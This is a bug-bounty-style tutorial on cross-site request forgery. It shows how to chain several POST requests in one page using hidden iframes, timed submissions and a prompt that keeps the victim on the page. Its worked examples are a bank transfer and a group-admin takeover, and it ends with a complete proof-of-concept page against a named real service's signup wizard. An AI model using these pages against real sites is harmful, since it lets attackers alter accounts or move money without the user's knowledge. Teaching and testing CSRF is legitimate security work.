How to create multi POST CSRF POC

0
192

CSRF is Widespread vulnerabilities , Some exploits needs you to send multi post requests , this article will help you to understand CSRF attack and how to trick a browser to make multi requests in single page

Hello Security training fans.

Today we are going to explain a problem that meets every white hat or bug bounty participators , when they face a situation that they find a CSRF and to exploit it you need to send two or more POST requests.

let’s start from the beginning.

What is CSRF?

cross site request forgery for more details you can read about it at owasp, but here we are considering those beginners and we are far away from complexity , let’s say that CSRF is a vulnerability occurs when an application can not determine if a request sent by a real user or by attacker.

Suppose the following scenario

If you logged in to your account at mysocialwebsite.com and decided to change your account password , so you :
1-navigate to account settings
2-then security
3-and pressed change my password
4-The website ask you to enter your new password , you typed Egypt12345.

Your browser will make the following request

http://mysocialwebsite.com/account/security/password/change?password=Egypt12345&confirm=Egypt12345

Now this request is made by you.

if you visited a blog or a website that contains the following code inside an html page:

______________________________________________________________________
<img src='http://mysocialwebsite.com/account/password/security/change?password=attackerpassword&confirm=attackerpassword' />
______________________________________________________________________

Your browser will render the img tag and send a request with your cookies to load an image from address

 http://mysocialwebsite.com/account/password/change?password=attackerpassword&confirm=attackerpassword 

which is injected by an attacker , when mysocialwebsite receives this request it will check the cookie and know it is you , so he will change your password to the one set by the attacker .
Two requests sent by your browser , the first is sent intentionally by you and the second is forgery injected by an attacker , but both will change your password .That is CSRF attacks.


What is our problem ?

The problem we are going to talk about is that some websites are vulnerable to CSRF but to exploit this vulnerability you need to send two or more POST requests .

Suppose the following scenario

1-Your brother wants to borrow some money .
2- You open your bank account .
3- You then click NEW , so you will make a new process to transfer the money to your brother.
The following request is sent

______________________________________________________________________
POST https://mybank.com/transfer/to/mybrotheraccount?amount=1000
Cookie: Your_cookie
______________________________________________________________________

3- The bank receives your request and asks you to confirm the transaction.
You hit ‘ok , i confirm’ , your browser sends the following request:

______________________________________________________________________
POST https://mybank.com/transfer/last?confirm=1
Cookie: Your_cookie
______________________________________________________________________

Now there is no CSRF protection , but to exploit it and transfer money from a victim to your account you need to make a victim :
1- First send the money .
2- Confirm the transfer.

If the bank web site accepts GET on transferring money , it will be so easy , you just need to embed the following code in your website and make the victim visits it.

______________________________________________________________________
<img src='https://mybank.com/transfer/to/attacker_account?amount=5000'/>
<img src='https://mybank.com/transfer/last?confirm=1 ' />
______________________________________________________________________

The browser will load two images , in fact it transfer money to your account and confirm it . it just will allow you to steal 5000$ from single user.

Great , But the bank is accepting only POST requests.
OK , i can tell you that you need to embed the following code in your blog specifically in article A :

______________________________________________________________________
<body onload=’document.getElementById(‘f1′).submit()’ >
<form id=’f1′ action=’https://mybank.com/transfer/to/attacker_account’ method=’POST’ >
<input name=’amount’ value=’1000′ />
</form>
</body>
______________________________________________________________________

After that , you need to create a new article we call it ‘B’ , and inject the following code to ask the victim browser to confirm the transfer :

______________________________________________________________________
<body onload='document.getElementById('f1').submit()' >
<form id='f1' action='https://mybank.com/transfer/last/' method='POST' >
<input name='last' value='1' />
</form>
</body>
______________________________________________________________________

By making a victim browses the articles A,B sequentially , we can achieve our goal and transfer money.

What if an attacker has only one opportunity to make a victim visits his website?
Here the main point we are talking about , if a bank accept GET requests , we can embeded two images and Exploit the csrf , but if a website only accepts POST so we need to send the two post requests using single page .

Ok , let’s make a single page submits two post requests

If you visit a page contains the following code:

______________________________________________________________________
<script>
function expl(){
document.getElementById('f1').submit();
document.getElementById('f2').submit();
}
</script>
<body onload='expl()' >
<form id='f1' action='facechat.com/mygroups/admins/remove/?id=realadmin' method='post' >
</form>
<form id='f2' action='facechat.com/mygroups/admins/add/?id=attacker' method='post' >
</form></body>
______________________________________________________________________

it will not send the two post requests Why?
Let’s break into the code
1- We have two forms have ids f1,f2
2- we set the body onload event that will call a function named ‘expl()’ when the document is loaded
3- after document loaded the function executes and submits the first form by calling form id ‘f1’
4- but the browser will stop executing when submitting the first form
5- we ended in facechat.com/mygroups/admins/remove


can you see what happened ?

we successfully deleted the admin , but we failed to add attacker as new admin , also the victim will be redirected to this page facechat.com/mygroups/admins/remove , and will see changes were made.


Let’s face the problem

What we need? we need to send two post requests .
What prevents us ? we can not send two post requests using single page .
ok we have a solution how will we do it ? we will use javascript without any user interaction .
what also we need ? we need to perform the attack without user feeling , no redirections , no visible contents or message should appear to him.


The soltuion

We will use iframe and make form Target attribute set to this iframe , when the form is submitted the contents will set to the iframe not the main page but the user will see the iframe , we will hide it using the following code.

______________________________________________________________________
<iframe name="if1" style="display: hidden=" width="0" height="0" frameborder="0" ></iframe>
______________________________________________________________________

now the following form :

______________________________________________________________________
<form id="form1" target="if1" action='x' ></form>
<iframe name="if1" style="display: hidden=" width="0" height="0" frameborder="0" ></iframe>
______________________________________________________________________

if submitted , it will load inside the iframe and the page look will not changed .

We explained the solution now .

But two new problems arises here
1- The first form will be submitted but the others ? may a user close the page and cancel the next forms submissions Solution we will create a message prevent the user from closing the page.
2- may the second form is submitted before the first , in our case may the browser confirm the process ‘request 2’ of transferring money before we actually send the money ‘request 1’.solution we will set time out or make a sleep before the next posts.

Now , i think we solved all the problems

The final algorithm
1- Create form 1 and set target to iframe1
2- create form 2 and set target to iframe2
3- submit the first form
4- waits 2 or three seconds
5- submit the next form .


Final POC

we have a real example disclosed and related to Mailchimp.com , an issue that allows attacker to change user info . We are not responsible for any illegal usage , please be an angel 😀

lets break in to the issue :
1- Mailchimp account settings is protected against CSRF using Tokens.
2- Mailchimp introduces you a wizard when you first make an account this wizard helps you
to edit your account info quickly .
3- this wizard is not protected against CSRF.
4- an attacker can use this wizard to edit a logged in user info.
5- if the vulnerability is exploited and account info is changed ,The hacked user is redirected to complete the wizard steps , so he/she can detect if he got hacked .
6- an attacker needs to send multi post requests , first to edit user info , second to complete wizard steps.

so the final poc used is

______________________________________________________________________
<!DOCTYPE html><html><head>
<title> MailChimp CSRF Proof Of Concept</title>
<script type="text/javascript">

function exec1()
{
document.getElementById('form1').submit();
setTimeout(exec2, 3000);
}
function exec2()
{
document.getElementById('form2').submit();
}
window.onbeforeunload=function(){
return "please wait";
}
</script>

</head><body>
<h3> Dear User </h3><h4><div id='r3'> Congrats! </div> </h4>
<body onload="exec1();" >

<form id="form1" target="if1" action="https://us14.admin.mailchimp.com/signup/new-user/welcome-wizard" method="POST">
<input type="hidden" name="step" value="flname" />
<input type="hidden" name="fname" value="youarehacked" />
<input type="hidden" name="lname" value="xGersy" />
<input type="hidden" name="x" value="x" />
</form>

<form id="form2" target="if2" action="https://us14.admin.mailchimp.com/signup/new-user/welcome-wizard" method="POST">
<input type="hidden" name="step" value="finish" />
</form>
<iframe name="if1" style="display: hidden=" width="0" height="0" frameborder="0" ></iframe>
<iframe name="if2" style="display: hidden=" width="0" height="0" frameborder="0"></iframe>

</body></html>

______________________________________________________________________

Let’s explain the code in details from bottom to top.

1- The first part is two hidden iframes.
2- the second part is two forms , the first edit user info , the second finishes the wizard steps.
3- The body onload event asks JS code to start working.
4-The JS code :
– Submittiing the first form
– Waits three seconds
– submit thesecond form
– set onbeforeunload event to prevent user from closing the window

I think you know how to create a multi POST CSRF POC.


Further reading

Owasp CSRF
Wikipedia
Owasp CSRF preventation cheat sheet
acunetix
ceriksen.com article
webappsec

An Exploit

LEAVE A REPLY

Please enter your comment!
Please enter your name here